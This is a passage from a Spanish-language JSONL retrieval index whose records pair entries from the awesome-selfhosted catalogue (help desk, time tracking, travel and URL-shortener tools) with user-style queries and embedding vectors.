tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "cual es una alternativa libre a los sistemas de gestiΓ³n de ayuda tΓ©cnica", "v": [-0.03795, 0.09515, -0.0966, -0.14845, 0.00142, -0.05634, -0.07997, -0.07535, -0.13158, 0.01096, -0.17793, -0.13098, -0.00598, 0.03496, 0.13396, -0.08128, 0.10323, -0.15822, 0.11037, -0.02962, -0.06828, -0.02777, -0.08828, -0.04173, -0.06501, -0.04796, 0.08314, -0.12868, -0.12112, 0.00061, 0.01276, -0.00967, 0.06441, -0.0466, -0.08464, 0.04077, 0.05816, 0.06554, 0.04706, -0.02093, -0.08842, -0.15586, -0.00022, 0.04858, 0.14304, -0.08936, 0.03133, 0.05535, 0.03092, 0.00438, -0.13487, -0.0304, -0.06923, -0.07482, 0.09062, -0.12712, 0.12723, -0.15114, -0.05752, -0.06717, -0.08565, 0.0176, 0.03016, -0.01189, 0.09686, 0.01405, -0.03672, -0.08514, -0.05631, 0.07493, 0.05162, -0.0012, 0.01952, -0.01377, -0.09539, 0.05811, 0.00126, 0.09627, -0.00338, -0.09456, 0.04478, -0.00992, -0.03841, 0.05674, -0.06328, -0.10779, 0.05146, -0.04458, 0.01864, -0.09059, 0.03223, -0.07941, 0.03667, 0.00063, 0.05846, 0.02932, -0.01406, 0.07047, -0.01056, 0.08, 0.05478, -0.07659, -0.12345, -0.03964, 0.01685, 0.02156, 0.07366, -0.05465, -0.07818, -0.01312, -0.07685, 0.06368, 0.01291, 0.00621, -0.09284, -0.06785, 0.03411, 0.00493, -0.05984, -0.0001, -0.05948, -0.01999, 0.02911, -0.06588, 0.10328, -0.02053, 0.09151, 0.05384, 0.00992, 0.0573, 0.0245, -0.04539, -0.09967, -0.06356, -0.03639, -0.01949, 0.06205, 0.0108, -0.01454, -0.00573, -0.09149, 0.09243, -0.00606, -0.04754, 0.0404, -0.06262, 0.10146, -0.10637, -0.01163, -0.04344, -0.00816, 0.00934, 0.00984, 0.11234, -0.06375, 0.01944, -0.00011, -0.02942, -0.0833, 0.04666, -0.00363, 0.00086, -0.0059, 0.02292, -0.08371, -0.01452, -0.00115, -0.01049, -0.01982, 0.02402, 0.00827, 0.07586, 0.0116, -0.02404, 0.01914, -0.11507, -0.01802, -0.13996, 0.0213, -0.04775, -0.05497, 0.00378, -0.04498, -0.02283, 0.02646, -0.02182, -0.06026, -0.02831, 0.02591, 0.08219, -0.0095, 0.00564, -0.09188, -0.06616, -0.05437, -0.01534, -0.02766, -0.07298, 0.00436, 0.00225, -0.08164, 0.01316, 0.02195, -0.07109, -0.04249, 0.05143, -0.04408, 0.0244, 0.01357, 0.03278, 0.04962, 0.02562, 0.04041, 0.01783, -0.04314, -0.0118, -0.00893, -0.01524, -0.03807, -0.0834, 0.05261, -0.0105, 0.04389, 0.05578, 0.01493, -0.00917, 0.07225, 0.07499, -0.04901, 0.0013, -0.01754, -0.04692, 0.05188, 0.04031, 0.04386, -0.02368, 0.04749, -0.02454, 0.01513, -0.04502, 0.06869, 0.12852, -0.01757, -0.03215, -0.01125, -0.04037, -0.12086, -0.01917, -0.02451, -0.07021, 0.00912, 0.03254, 0.00881, -0.01279, 0.061, -0.03229]} -{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "que programa me sirve para que mis empleados sepan exactamente cuΓ‘nto tiempo pasan en cada tarea?", "v": [-0.01612, 0.17737, -0.08693, -0.09776, 0.00225, -0.13442, 0.06056, -0.15352, -0.10609, -0.05284, -0.15548, 0.04884, 0.13932, -0.07835, 0.08422, 0.03161, 0.06279, -0.04741, 0.18406, 0.01548, 0.03667, -0.06071, 0.02652, -0.05372, -0.07114, 0.04829, 0.07485, -0.02914, -0.14792, 0.10862, 0.11105, 0.02151, 0.05146, -0.2023, 0.03032, 0.07973, -0.06006, 0.06245, -0.03356, 0.03979, 0.03493, 0.05181, -0.005, -0.01532, 0.0861, 0.02476, 0.11353, 0.0855, -0.07836, 0.04482, -0.12709, -0.00882, 0.05079, -0.02927, -0.03899, -0.01124, 0.04463, -0.01648, -0.06651, 0.02951, -0.06025, 0.0984, -0.01097, -0.06126, 0.07947, -0.01235, 0.10989, -0.0757, 0.01831, -0.03886, -0.11617, 0.00148, -0.08529, -0.09844, -0.00829, 0.05728, -0.00728, -0.03572, -0.01342, -0.04856, 0.01465, 0.01982, -0.00482, 0.03802, -0.08204, -0.01137, 0.15066, 0.01329, 0.01662, -0.02004, -0.04708, 0.07547, -0.02234, 0.05744, -0.08205, 0.05466, 0.07684, -0.04335, -0.05387, 0.1909, 0.04113, -0.09119, -0.03822, 0.01545, -0.09252, 0.20133, 0.00353, 0.03472, 0.02644, -0.02997, 0.02251, -0.02705, -0.07951, -0.05813, -0.10494, 0.03003, -0.00269, -0.04001, -0.04247, -0.05022, -0.10408, 0.04295, 0.03619, 0.0837, 0.08447, -0.08773, 0.03971, 0.05055, 0.03923, 0.01269, -0.10562, 0.01617, 0.00412, 0.04119, -0.04314, -0.05831, 0.05668, -0.03457, -0.01402, -0.04015, -0.03228, 0.03238, -0.01213, -0.00969, 0.06456, 0.01512, 0.07822, -0.06939, -0.02912, -0.01522, -0.08312, -0.05664, 0.01719, 0.04776, -0.0633, -0.02986, 0.01805, 0.01926, -0.04676, 0.01933, 0.02594, -0.0056, -0.01518, -0.02408, 0.03929, -0.09031, -0.021, 0.05351, 0.06615, 0.06025, -0.01281, 0.01106, 0.09613, -0.09074, 0.03602, -0.01829, -0.01098, -0.02748, 0.05453, 0.05565, -0.04947, 0.07499, 0.03825, -0.00811, -0.01822, -0.03865, 0.06032, 0.07353, -0.0453, 0.03425, -0.01931, -0.02041, 0.02894, 0.0248, 0.00727, 0.02578, 0.01589, -0.01963, 0.03643, -0.03743, 0.01539, -0.08881, 0.01312, 0.06827, 0.03038, 0.11329, -0.0441, 0.06681, 0.0236, 0.09967, 0.06966, 0.01688, 0.04918, 0.04495, -0.01152, 0.00229, 0.096, -0.0134, 0.00929, 0.02166, 0.04759, 0.03374, 0.031, -0.04041, -0.04133, -0.0256, 0.0561, 0.03941, 0.0219, 0.007, -0.05676, -0.00979, -0.02072, -0.03723, -0.01108, -0.04178, -0.02704, -0.01374, -0.05045, -0.11329, 0.01173, 0.12872, -0.01798, -0.08913, -0.02033, 0.02082, -0.01769, -0.0304, -0.03929, -0.00391, -0.03903, -0.01275, 0.0147, -0.03171, 0.0214, -0.0238]} -{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "necesito una aplicaciΓ³n gratuita para registrar mi tiempo de trabajo y generar reportes fΓ‘ciles de leer.", "v": [0.0096, 0.19662, -0.17172, -0.25528, 0.13157, -0.05131, -0.10764, 0.11068, -0.09002, -0.07517, -0.10965, -0.13515, 0.01963, -0.08195, 0.06817, 0.03306, 0.029, -0.03948, -0.01429, 0.02491, -0.0132, 0.02771, -0.09016, -0.00865, -0.071, -0.0048, 0.0867, -0.19199, -0.05639, 0.18822, -0.07465, 0.04359, 0.05835, -0.06445, -0.04124, 0.02528, -0.00723, -0.0299, -0.08628, 0.06553, 0.15782, 0.09455, -0.13275, 0.08523, 0.00761, -0.00179, 0.07549, -0.03223, -0.15564, 0.04696, 0.0137, -0.06308, -0.02152, -0.00657, -0.14338, 0.02242, 0.15789, -0.09544, 0.0032, -0.04246, -0.07004, 0.08624, -0.00258, 0.00728, -0.0043, -0.10023, 0.11897, 0.06257, -0.05396, 0.01553, -0.0719, 0.0624, 0.01541, -0.0685, 0.04358, -0.01066, -0.05947, -0.10319, -0.03591, 0.08354, -0.01412, -0.02357, 0.01234, 0.0452, -0.08812, 0.02813, 0.02888, -0.04423, 0.0705, 0.04472, 0.01214, 0.03031, 0.04007, -0.01061, 0.05091, -0.04511, 0.05244, -0.04559, -0.01057, 0.09867, 0.02909, -0.10822, 0.03823, 0.00397, -0.04837, 0.01615, 0.03418, 0.035, -0.04732, -0.00185, -0.02603, -0.06893, -0.06359, -0.00481, 0.00012, -0.02195, 0.01132, -0.05511, 0.02994, -0.02618, -0.00385, 0.08607, 0.01305, -0.04859, -0.00467, -0.0769, 0.04557, 0.00663, 0.02315, 0.07657, 0.03058, -0.04298, -0.17943, -0.05108, 0.00615, 0.02738, 0.00758, -0.02284, 0.01672, -0.02848, -0.00192, 0.00063, -0.04319, -0.02614, 0.00465, 0.00701, 0.04951, -0.04965, -0.07274, -0.1039, -0.02884, -0.09616, -0.02123, 0.04839, -0.06727, -0.01273, 0.03324, -0.03936, -0.01013, -0.05575, 0.03595, 0.03983, -0.07509, -0.0689, -0.03046, -0.08292, 0.00474, -0.01069, 0.07235, 0.0234, -0.04332, 0.03277, 0.07565, -0.13846, 0.06885, -0.05559, 0.02535, -0.01768, -0.05308, -0.05135, 0.02588, 0.02948, 0.03057, -0.00018, -0.03475, -0.0328, 0.05529, 0.03902, -0.01067, 0.09535, 0.02451, 0.0292, -0.00223, -0.00293, 0.04734, -0.04107, 0.0594, -0.10202, -0.02723, -0.01575, -0.05631, -0.08856, -0.0877, -0.00541, 0.02013, 0.02229, -0.01584, 0.09592, -0.01176, 0.01045, 0.05048, 0.02102, -0.00377, -0.01643, 0.0246, 0.00168, 0.04404, -0.03518, -0.00182, -0.01193, 0.04313, 0.00644, 0.04383, -0.01919, 0.01578, -0.00746, 0.0692, 0.01514, -0.01545, 0.02161, 0.00278, 0.02624, -0.04291, -0.06683, 0.03971, 0.01447, 0.03959, 0.00054, -0.02798, -0.00493, 0.02855, 0.09677, 0.01969, 0.0059, -0.09644, -0.05216, -0.00963, 0.03789, -0.05286, -0.08933, -0.06155, -0.00023, 0.05377, -0.01307, 0.03155, -0.01679]} -{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "cual es el mejor software libre para que un freelancer pueda llevar la contabilidad de su tiempo sin usar tareas tradicionales?", "v": [0.09684, 0.08821, -0.18255, -0.04168, -0.04719, -0.13303, 0.03946, -0.04875, -0.03145, -0.08439, -0.18701, -0.08876, -0.01577, 0.00477, -0.06686, 0.01551, 0.06983, -0.14236, 0.11138, 0.00726, 0.0164, -0.02502, -0.12912, -0.0943, -0.05761, -0.05441, 0.11774, -0.06287, -0.15376, 0.10574, 0.04934, 0.00093, 0.17781, -0.15282, 0.02406, 0.06445, 0.00038, 0.11061, -0.05623, -0.04838, 0.11242, 0.02862, -0.05611, 0.10184, 0.0588, -0.01413, 0.00704, 0.03425, -0.06738, 0.08195, 0.02432, -0.07627, -0.00401, -0.03087, 0.01939, -0.10384, 0.10802, -0.00768, -0.0217, -0.02428, -0.05275, 0.18029, 0.02752, 0.00519, -0.0205, -0.0581, 0.03251, -0.02082, -0.06015, -0.01155, 0.03228, 0.06314, -0.04037, -0.01363, -0.05598, 0.02649, -0.0372, 0.00032, -0.01444, 0.00118, -0.00153, -0.08833, -0.00299, 0.07816, -0.14577, -0.13309, 0.13121, -0.06823, 0.05706, 0.02704, 0.02032, 0.01666, 0.00104, 0.05272, 0.03018, 0.03056, 0.06202, 0.06589, 0.00499, 0.0636, 0.0304, -0.0886, -0.05072, 0.07302, -0.03599, 0.05201, 0.07136, -0.0234, 0.03002, -0.03119, -0.02687, 0.00131, -0.06753, -0.01845, -0.10051, 0.03751, -0.04379, -0.10696, 0.05467, -0.00693, 0.09665, -0.06415, 0.00171, 0.00113, 0.06959, -0.03754, 0.10307, 0.13301, -0.0083, -0.02378, -0.00229, -0.07382, -0.07584, -0.04034, -0.04462, 0.03898, 0.09121, -0.06303, 0.021, -0.02682, -0.07155, 0.01426, -0.03171, -0.0449, 0.10629, 0.0086, 0.03699, -0.04993, -0.08426, -0.02857, 0.01957, 0.02129, -0.02498, 0.08234, -0.05309, -0.00222, 0.00536, 0.01219, -0.0592, 0.05276, -0.00428, 0.03578, 0.00064, -0.07526, 0.01245, -0.0807, 0.04229, 0.0562, 0.01901, 0.01192, -0.01089, 0.08182, 0.02853, -0.12254, 0.04128, -0.08988, 0.01826, -0.08171, 0.03406, -0.04065, -0.07224, 0.07441, -0.00518, -0.04974, 0.02696, -0.02052, 0.01908, 0.02198, -0.01726, 0.03532, -0.02822, 0.00898, -0.02382, -0.07759, 0.0021, 0.0211, -0.03007, -0.02036, -0.01355, -0.02508, -0.05974, -0.03524, -0.04748, -0.03046, 0.02344, 0.09166, -0.05068, 0.11404, -0.00319, 0.05388, 0.01885, -0.04414, 0.05145, -0.05651, -0.04538, 0.00787, 0.00562, -0.08883, -0.00033, -0.00371, 0.05135, 0.01967, 0.0706, -0.06383, 0.02754, 0.03356, 0.11053, 0.11247, -0.01104, 0.00892, -0.02166, 0.06753, -0.02658, -0.04805, 0.00129, -0.00503, 0.00896, -0.04917, -0.02472, -0.04283, 0.0142, 0.10539, -0.02709, -0.0423, -0.0628, 0.00426, -0.09743, -0.01724, -0.04315, -0.07351, -0.09097, 0.05986, 0.08008, -0.00615, 0.02627, -0.00933]} -{"tipo": "pregunta", "herramienta": "Travel Organization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Travel Organization", "tema": "travel organization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Travel Organization: Surmai β€” Collaborative personal and family travel organizer [MIT, Docker].", "indexar": "que programa puedo usar para organizar viajes en familia de forma colaborativa?", "v": [0.16985, 0.12497, -0.17194, -0.11944, 0.04794, -0.08479, 0.06619, -0.04216, -0.02194, -0.20014, -0.10557, -0.12332, 0.0333, -0.02055, 0.02321, -0.02811, 0.20146, -0.0206, 0.0166, -0.01425, -0.05338, 0.0555, -0.02976, 0.03522, -0.01087, -0.04881, 0.14616, -0.10844, -0.06729, -0.02528, 0.04712, 0.03055, 0.09489, -0.07603, 0.00919, 0.02194, -0.00382, -0.03353, -0.03433, -0.10058, -0.13838, 0.0254, -0.11006, 0.08245, 0.01671, 0.07713, -0.0683, -0.02342, -0.11117, -0.04078, -0.02656, -0.04771, 0.02104, 0.04818, 0.02467, -0.07035, -0.00936, -0.21074, -0.06473, 0.08982, -0.02933, 0.02278, -0.00812, 0.11659, 0.05409, 0.04962, 0.03327, -0.02122, -0.04333, 0.02712, -0.07834, 0.05906, 0.02068, -0.03674, -0.00841, 0.05281, 0.0947, -0.03077, 0.07936, 0.01806, 0.10177, 0.04922, 0.03747, 0.04662, -0.02186, -0.08995, 0.10457, -0.00416, 0.07822, -0.02583, -0.03088, -0.01737, 0.08581, -0.02644, -0.00323, -0.0175, 0.14093, 0.02913, 0.10035, 0.10557, 0.04132, -0.14835, -0.01648, 0.08747, -0.12727, 0.06178, 0.0686, 0.04316, -0.04109, 0.01962, -0.00139, 0.06789, -0.00041, -0.01354, -0.05536, -0.02459, 0.03069, -0.04879, 0.02726, -0.08781, -0.02989, 0.04245, 0.00879, 0.01567, 0.12355, -0.00986, -0.01867, 0.11242, -0.01979, 0.02398, -0.03485, 0.05767, -0.03025, -0.00906, -0.03429, -0.04738, -0.07375, 0.02342, 0.05775, -0.09937, 0.05153, 0.04631, -0.02453, -0.08542, 0.02201, -0.01115, -0.00401, 0.00947, -0.04046, 0.08924, 0.04653, 0.02984, -0.00979, 0.02262, 0.01336, 0.05881, -0.0059, -0.05248, -0.04228, 0.01228, -0.02899, -0.00088, 0.00112, -0.01638, 0.04993, -0.06173, 0.05269, -0.04056, -0.00814, 0.01321, -0.03652, 0.0685, 0.04963, -0.07753, 0.01171, -0.04779, -0.06186, -0.0655, 0.00194, -0.04389, -0.0661, 0.06275, -0.04474, 0.00231, -0.02423, 0.02496, 0.03154, 0.06229, 0.02307, -0.04659, -0.05133, 0.04822, 0.04795, 0.01327, -0.01953, -0.07806, -0.01602, -0.03055, 0.08969, -0.0126, 0.01667, -0.04198, 0.03441, -0.04819, 0.04178, 0.07619, -0.06452, 0.04755, 0.07962, 0.15968, 0.03936, -0.06394, 0.04181, 0.02265, -0.08315, 0.05576, -0.08442, 0.00312, 0.08275, 0.09069, 0.03078, 0.06616, -0.0131, -0.02793, 0.08918, -0.0533, 0.03687, -0.02084, 0.04292, -0.05478, 0.04227, -0.03751, 0.03766, -0.03096, -0.02768, 0.012, 0.00165, -0.03458, 0.00659, 0.0046, 0.012, 0.01931, -0.01052, 0.00417, -0.08333, -0.06722, -0.0625, 0.06221, 0.04672, -0.05688, -0.01753, 0.06516, 0.06975, -0.08136, 0.01915, 0.03208]} -{"tipo": "pregunta", "herramienta": "Travel Organization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Travel Organization", "tema": "travel organization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Travel Organization: Surmai β€” Collaborative personal and family travel organizer [MIT, Docker].", "indexar": "cual es una herramienta libre y abierta para gestionar mis planes de viaje con mi familia?", "v": [-0.08986, 0.08019, -0.12847, -0.11463, -0.07827, -0.03909, -0.05642, -0.01006, -0.08025, -0.17173, -0.06569, -0.12893, 0.02263, 0.01048, 0.07808, 0.01598, 0.12138, 0.03425, 0.05991, -0.00879, -0.14699, 0.07688, -0.03142, -0.08994, -0.13915, -0.0501, 0.15886, -0.05981, -0.18389, 0.02366, 0.01131, 0.05039, 0.05896, -0.06392, 0.07886, -0.03483, 0.02175, 0.11951, 0.0005, -0.06888, -0.07758, -0.03916, -0.08821, 0.1301, 0.02998, -0.06038, -0.02334, 0.02685, -0.04315, 0.03419, -0.08706, -0.15132, -0.00697, 0.1093, 0.05545, -0.02656, 0.13728, -0.13083, 0.02573, 0.07168, -0.10979, 0.01771, 0.00792, 0.03419, 0.01334, -0.04252, 0.07095, -0.0306, -0.0543, 0.04263, -0.02695, 0.05516, 0.05573, 0.04274, 0.01232, -0.03783, 0.08387, 0.07536, 0.0467, 0.03606, 0.13309, 0.00653, -0.15785, 0.01463, 0.01437, -0.11931, 0.09287, 0.02058, 0.05829, 0.06571, -0.01586, -0.03144, -0.04675, 0.03034, -0.06987, 0.00682, 0.0683, -0.01747, 0.04709, 0.07256, 0.12891, -0.05379, -0.107, 0.09619, -0.09293, 0.06507, 0.06258, -0.00138, -0.11946, 0.0721, -0.01666, -0.0033, 0.03478, 0.01417, -0.08346, 0.00239, -0.05611, -0.04221, 0.02083, -0.06264, -0.0581, -0.02751, 0.00886, -0.00876, 0.06045, -0.02327, -0.08336, 0.07404, -0.01298, 0.00925, -0.00784, 0.00645, -0.0597, -0.05251, -0.02929, -0.04771, -0.03589, -0.06498, 0.03973, -0.09906, -0.0176, 0.04771, 0.03183, -0.07525, 0.07239, -0.03022, -0.05103, -0.01952, -0.0269, 0.0181, -0.06303, 0.02552, 0.07588, 0.10215, 0.0228, 0.088, -0.06095, -0.03455, -0.08565, 0.04926, -0.00425, -0.03159, 0.02848, 0.01202, 0.06913, -0.03147, -0.02359, -0.03347, -0.02144, 0.01301, -0.02264, 0.03003, 0.09635, 0.01099, 0.03422, -0.11653, -0.02841, -0.07654, -0.00728, -0.08009, -0.06575, 0.05082, -0.03366, 0.01705, -0.09666, -0.00409, 0.00523, 0.03553, 0.05488, 0.02228, -0.0375, 0.00903, 0.02455, -0.0401, 0.01403, -0.03175, -0.05243, -0.06392, 0.05602, 0.0135, -0.03786, -0.05358, 0.02484, -0.06969, -0.00306, 0.09373, 0.01557, 0.01577, 0.00659, 0.10286, 0.03824, 0.0031, 0.06535, -0.00824, -0.06531, 0.04909, -0.00465, 0.00154, 0.0501, 0.07247, 0.07401, 0.08809, 0.04749, -0.04179, 0.02205, -0.01458, 0.00411, -0.02618, 0.04523, -0.10575, 0.03155, 0.01439, 0.02299, 0.00986, 0.00704, -0.00982, 0.04856, -0.04061, -0.03541, 0.01184, 0.05719, 0.06848, 0.04318, -0.05421, -0.06679, -0.03255, -0.05487, 0.03388, 0.02046, -0.08814, -0.05237, 0.05429, 0.06029, -0.056, 0.00513, -0.03273]} -{"tipo": "pregunta", "herramienta": "Travel Organization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Travel Organization", "tema": "travel organization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Travel Organization: Surmai β€” Collaborative personal and family travel organizer [MIT, Docker].", "indexar": "existe alguna alternativa gratuita a los sistemas de reservas tradicionales para planificar un viaje?", "v": [0.16776, 0.12712, -0.16241, -0.07716, -0.00678, 0.02676, 0.09563, -0.07834, -0.13789, -0.14566, -0.02982, -0.11778, 0.10735, 0.02453, 0.12834, 0.00301, 0.08286, 0.09467, 0.16571, -0.02515, -0.04721, -0.03667, -0.05521, 0.01116, -0.1193, -0.07805, 0.04305, -0.07043, -0.12553, 0.07164, 0.06992, 0.08538, 0.07966, -0.07949, -0.05615, 0.03414, 0.10132, 0.08559, -0.04701, -0.17288, 0.10467, -0.06441, 0.02991, 0.10166, -0.06524, -0.04281, -0.12126, 0.01205, -0.04918, -0.04247, -0.00977, 0.0017, -0.05122, 0.02552, 0.16476, -0.04665, 0.08533, -0.08338, -0.04064, 0.00974, 0.017, 0.07709, 0.08851, 0.04888, 0.18206, 0.0512, -0.03796, -0.02113, -0.0154, -0.0111, -0.05865, 0.05165, 0.0503, -0.01031, -0.00404, 0.00152, 0.14593, 0.07151, 0.00867, 0.0073, 0.02498, 0.00705, -0.02386, 0.05602, -0.09021, -0.0764, 0.03647, -0.04262, 0.00085, 0.01898, 0.00257, 0.01208, 0.02577, 0.11599, 0.01887, -0.10208, 0.00704, 0.05668, -0.01964, 0.11868, 0.057, -0.00034, 0.0099, 0.10611, -0.04845, 0.06789, 0.12109, -0.00388, 0.03002, 0.06194, -0.0345, -0.01061, -0.00796, -0.00369, -0.0349, -0.01114, 0.0213, 0.01414, 0.01313, 0.00294, -0.08807, 0.06776, -0.06145, -0.03302, 0.05378, 0.00564, -0.05956, 0.06749, 0.00663, 0.01248, 0.03278, -0.01511, -0.0334, -0.03911, -0.05969, -0.04306, 0.07119, 0.02797, 0.10505, -0.02112, -0.04932, 0.05057, -0.05657, -0.0904, 0.03656, 0.08175, 0.07102, -0.06047, -0.01871, -0.01374, -0.0918, -0.00178, -0.01571, 0.0566, 0.03946, 0.09551, -0.06371, -0.08547, -0.07689, 0.1483, 0.04966, -0.02769, -0.00572, 0.03063, -0.02061, -0.07087, -0.00419, -0.09139, 0.01012, 0.06279, 0.01987, 0.06612, 0.07766, -0.12378, 0.03063, -0.01221, -0.03143, -0.04903, 0.06695, -0.03089, -0.05204, 0.00565, -0.09658, -0.02725, 0.02384, 0.01812, -0.01264, 0.0633, 0.01137, 0.03273, 0.01697, 0.02505, -0.0157, 0.03038, -0.03542, -0.0711, -0.02575, -0.05631, -0.00713, 0.01788, -0.05054, 0.01143, 0.04191, -0.07849, -0.00416, 0.06694, 0.00493, 0.03931, -0.00314, 0.09094, 0.03374, -0.03364, 0.0189, -0.10342, -0.05385, 0.01758, -0.00113, -0.04939, -0.00362, -0.043, 0.05353, 0.02481, 0.02053, 0.04916, 0.09258, 0.00958, 0.03097, 0.0465, -0.00331, -0.00035, 0.0433, -0.00842, 0.00759, 0.01926, 0.04308, 0.0322, 0.00699, -0.01328, -0.04214, 0.01444, 0.04329, 0.06573, -0.01386, -0.02197, -0.02597, -0.05753, -0.09322, -0.00066, 0.03884, -0.05444, -0.01582, 0.07032, 0.04147, -0.00662, 0.01811, -0.06339]} -{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: bit β€” Fast, lightweight, resource-efficient, compiled URL shortener [MIT, Docker/Crystal]. Chhoto URL β€” Simple, lightning-fast URL shortener with no bloat (fork of simply-shorten) [MIT, Rust/Docker]. clink β€” A super-minimal link shortening service written in pure C, focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Flink β€” Create QR Codes, embeddable link previews for your website and crawls/scrapes metadata [MIT, Docker]. Kutt β€” Modern URL shortener with support for custom domains and custom URLs [MIT, Nodejs/Docker]. rs-short β€” Lightweight link shortener written in Rust, with features such as caching, spambot protection and phishing detection [MPL-2.0, Rust]. Shlink β€” URL shortener with REST API and command line interface. Includes official progressive web application and docker images [MIT, PHP/Docker]. Simple-URL-Shortener β€” KISS URL shortener, public or private (with account). Minimalist and lightweight. No dependencies [MIT, PHP].", "indexar": "que programa hay para acortar URLs sin instalar nada", "v": [-0.05452, -0.01655, -0.12654, -0.11022, 0.08305, -0.15061, -0.0025, -0.04407, -0.11372, 0.05425, -0.1247, -0.1573, 0.05344, -0.13804, -0.03894, -0.06371, -0.03632, -0.18476, 0.13874, 0.05446, -0.04219, 0.07586, -0.00917, -0.09188, -0.10007, 0.08118, -0.02967, -0.08425, -0.0526, -0.11792, 0.04909, 0.00384, 0.05567, -0.02788, -0.11575, -0.00421, 0.06659, -0.09927, 0.06583, 0.00901, 0.02631, 0.02691, 0.08012, 0.1068, 0.02424, -0.06441, 0.07161, -0.10981, 0.12106, -0.08799, 0.05894, 0.04856, 0.06102, -0.02397, 0.03069, -0.08405, -0.04188, -0.12796, -0.04137, 0.00973, -0.05657, 0.09821, -0.04022, 0.08878, 0.04866, 0.08237, 0.06082, 0.04045, -0.1082, 0.01272, -0.0134, 0.0053, 0.04673, -0.03304, -0.01101, 0.08249, -0.05314, -0.03905, 0.05551, -0.05869, 0.03808, -0.03591, 0.05574, 0.09152, -0.01498, -0.00723, 0.00094, 0.00941, -0.00026, -0.09068, -0.06824, 0.02307, 0.00394, 0.05404, 0.06434, -0.20582, 0.12971, 0.05319, 0.06384, 0.08817, -0.0197, -0.06172, -0.02065, 0.13115, -0.04542, 0.02085, 0.04546, -0.04953, -0.00421, 0.0472, 0.02464, 0.064, -0.06727, -0.04582, -0.05297, 0.01782, -0.02687, -0.01811, -0.05854, -0.10189, -0.11209, -0.04214, -0.073, 0.05829, 0.01745, 0.01758, 0.03649, 0.07629, -0.06386, 0.11767, 0.04158, -0.08477, 0.0753, -0.05328, -0.06182, -0.05002, 0.01229, -0.03436, -0.0738, -0.03388, 0.00108, 0.07019, -0.01511, 0.02435, -0.00707, 0.01177, -0.04124, 0.00974, 0.02489, 0.0201, 0.02686, 0.0881, 0.01192, 0.03515, 